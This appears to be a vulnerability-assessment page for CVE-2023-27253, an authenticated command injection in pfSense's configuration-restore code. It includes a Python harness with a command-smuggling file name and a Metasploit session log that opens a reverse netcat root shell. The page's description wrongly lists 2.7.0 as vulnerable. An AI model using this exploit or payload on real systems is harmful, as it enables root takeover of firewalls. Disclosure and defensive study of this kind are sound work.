Attacker Value
Low
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network

CVE-2023-27253

Disclosure Date: March 17, 2023

Description

A command injection vulnerability in the function restore_rrddata() of Netgate pfSense v2.7.0 allows authenticated attackers to execute arbitrary commands via manipulating the contents of an XML file supplied to the component config.xml.


Technical Analysis

On March 17, 2023 it was disclosed that pfSense versions 2.6.0 and below are vulnerable to an authenticated remote code execution flaw that yields command execution in the context of the root user.

Authenticated users can upload and restore a backup pfSense configuration XML file from the /diag_backup.php endpoint:

[Screenshot: the backup/restore page at /diag_backup.php]

A file name taken from the uploaded configuration XML is under the attacker's control. In vulnerable versions that file name is interpolated, without sanitization, into the command string passed to exec() in the restore_rrddata() function in /etc/inc/config.lib.inc.

The vulnerable exec() call can be seen below on line 288 of the excerpt, taken from the vulnerable 2.6.0 source code.

[Screenshot: the vulnerable exec() call in restore_rrddata(), pfSense 2.6.0 source, /etc/inc/config.lib.inc]

The fix wraps both paths in escapeshellarg(), so each is handed to the shell as a single literal argument:

exec("{$rrdtool} restore -f " . escapeshellarg($xml_file) . ' ' . escapeshellarg($rrd_file), $output, $status);
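The harness below is an added example, not code from the original assessment or from pfSense. It models the quoting defect in Python: escapeshellarg() is reimplemented with PHP's behaviour (wrap in single quotes, turn each embedded single quote into '\''), the unpatched command is built with bare single quotes around the attacker-influenced paths as the unpatched line did, and the patched command uses the escaping. rrdtool is replaced by echo so the commands run anywhere; the /tmp/rrd prefix and the hostile file name are constructed for the demonstration and are assumptions, not values from the page.

```python
"""Model of the quoting bug behind CVE-2023-27253 (added example, not pfSense code)."""
import subprocess


def escapeshellarg(arg: str) -> str:
    """Reimplementation of PHP's escapeshellarg() on POSIX systems.

    Every embedded single quote becomes '\\'' (close quote, escaped quote,
    reopen quote) and the whole string is wrapped in single quotes, so the
    shell sees exactly one argument no matter what the string contains.
    """
    return "'" + arg.replace("'", "'\\''") + "'"


def vulnerable_command(rrdtool: str, xml_file: str, rrd_file: str) -> str:
    # Mirrors the unpatched interpolation: bare single quotes around paths the
    # attacker influences. A single quote inside the path ends the quoting.
    return f"{rrdtool} restore -f '{xml_file}' '{rrd_file}'"


def patched_command(rrdtool: str, xml_file: str, rrd_file: str) -> str:
    # Mirrors the fixed line: each path passes through escapeshellarg().
    return f"{rrdtool} restore -f {escapeshellarg(xml_file)} {escapeshellarg(rrd_file)}"


def run_shell(cmd: str) -> list[str]:
    """Run a command string through sh -c, as PHP's exec() does, and return stdout lines."""
    proc = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)
    return proc.stdout.splitlines()


def restore_rrd_lines(name: str, build) -> list[str]:
    """Derive the .xml/.rrd paths from an RRD file name (assumed /tmp/rrd prefix),
    build the command with the given builder and execute it with echo standing
    in for rrdtool.
    """
    xml_file = f"/tmp/rrd/{name}.xml"
    rrd_file = f"/tmp/rrd/{name}.rrd"
    return run_shell(build("echo", xml_file, rrd_file))


# Constructed attacker-controlled file name: closes the open single quote, runs
# a command, then reopens a quote so the rest of the line stays well formed.
HOSTILE_NAME = "x'; echo INJECTED; '"


def injected(lines: list[str]) -> bool:
    """True if the injected command actually ran (its output appears as its own line)."""
    return "INJECTED" in lines


if __name__ == "__main__":
    print("vulnerable:", injected(restore_rrd_lines(HOSTILE_NAME, vulnerable_command)))
    print("patched:   ", injected(restore_rrd_lines(HOSTILE_NAME, patched_command)))
    print("patched output:", restore_rrd_lines(HOSTILE_NAME, patched_command))
```

With the hostile name the unpatched builder produces three shell commands, and the second one runs; the patched builder produces one echo whose output merely contains the injected text as data.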

Attacker Value and Exploitation

Because valid credentials are required, the attacker value is not especially high, but it is still useful to a malicious actor: it yields root on pfSense, the "World's Most Trusted Open Source Firewall". Once credentials are obtained, exploitation is straightforward.

Metasploit

Exploiting this vulnerability with Metasploit takes three steps: set rhosts, set lhost, run.

msf6 > use unix/http/pfsense_config_data_exec
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/http/pfsense_config_data_exec) > set rhosts 172.16.199.190
rhosts => 172.16.199.190
msf6 exploit(unix/http/pfsense_config_data_exec) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(unix/http/pfsense_config_data_exec) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target appears to be running pfSense version 2.5.1-RELEASE, which is unpatched!
[*] Command shell session 7 opened (172.16.199.1:4444 -> 172.16.199.191:55669) at 2023-07-12 14:48:15 -0400

id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE 1b709158e581(RELENG_2_5_0) pfSense  amd64

Mitigation

Update pfSense to version 2.7.0 or higher.

CVSS V3 Severity and Metrics
Base Score:
8.8 High
Impact Score:
5.9
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • netgate

Products

  • pfsense 2.7.0
